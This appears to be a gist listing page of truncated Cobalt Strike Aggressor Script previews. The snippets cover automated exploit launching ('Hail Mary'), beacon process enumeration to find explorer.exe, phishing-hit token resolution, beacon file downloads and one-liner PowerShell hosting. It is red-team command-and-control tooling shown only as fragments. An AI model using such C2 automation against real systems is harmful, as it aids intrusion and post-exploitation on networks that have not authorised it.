This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# | |
# This code is related to the Attacks -> Find Attacks and Attacks -> Hail Mary features | |
# | |
sub exploitPorts { | |
local('$exploit %exploits $options $port'); | |
foreach $exploit (modules("exploits")) { | |
$options = options("exploit", $exploit); | |
if ('RPORT' in $options) { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# | |
# This code is related to the Attacks -> Find Attacks and Attacks -> Hail Mary features | |
# | |
popup attacks { | |
item "&Find Attacks" { | |
spawn(&runFindAttacks); | |
} | |
item "&Hail Mary" { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# | |
# Quick/Dirty IRC Library for use with Aggressor Script | |
# https://www.cobaltstrike.com/aggressor-script/index.html | |
# | |
# irc_close($handle); | |
sub irc_close { | |
println($1, "QUIT :Good bye!"); | |
closef($1); | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# demonstrate an example of inversion-of-control with Aggressor Script | |
# | |
# co-routine, | |
sub bot { | |
# run pwd and get the output. | |
bpwd($bid); | |
when("beacon_output_alt", $this); | |
yield; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# getexplorerpid($bid, &callback); | |
sub getanypid { | |
bps($1, lambda({ | |
local('$pid $name $entry'); | |
foreach $entry (split("\n", $2)) { | |
($name, $pid) = split("\\s+", $entry); | |
if ($name eq $proc) { | |
# $1 is our Beacon ID, $pid is the PID of $proc | |
[$callback: $1, $proc, $pid]; | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# getexplorerpid($bid, &callback); | |
sub getexplorerpid { | |
bps($1, lambda({ | |
local('$pid $name $entry'); | |
foreach $entry (split("\n", $2)) { | |
($name, $pid) = split("\\s+", $entry); | |
if ($name eq "explorer.exe") { | |
# $1 is our Beacon ID, $pid is the PID of explorer.exe | |
[$callback: $1, $pid]; | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# | |
# This script overrides WEB_HIT and PROFILER_HIT from default.cna to | |
# resolve the id var (token) to an email | |
# | |
# https://www.cobaltstrike.com/aggressor-script/cobaltstrike.html | |
# | |
# method, uri, addr, ua, response, size, handler, when | |
set WEB_HIT { | |
local('$out $now $method $uri $addr $ua $response $size $handler $when $params'); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# | |
# safe delete in file browser right-click menu | |
# | |
popup_clear("filebrowser"); | |
popup filebrowser { | |
item "&Download" { | |
local('$file'); | |
foreach $file ($3) { | |
bdownload($1, "$2 $+ \\ $+ $file"); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# host a PowerShell script on a one-off web server via Beacon. | |
# | |
# Why? Generate one-liners for length constrained command execution opportunities | |
# | |
# NOTE: this uses internal APIs and is subject to break in the next release. Don't hate! | |
# if there's interest in this capability, I can build an official API for it. | |
import common.*; | |
import beacon.*; |
OlderNewer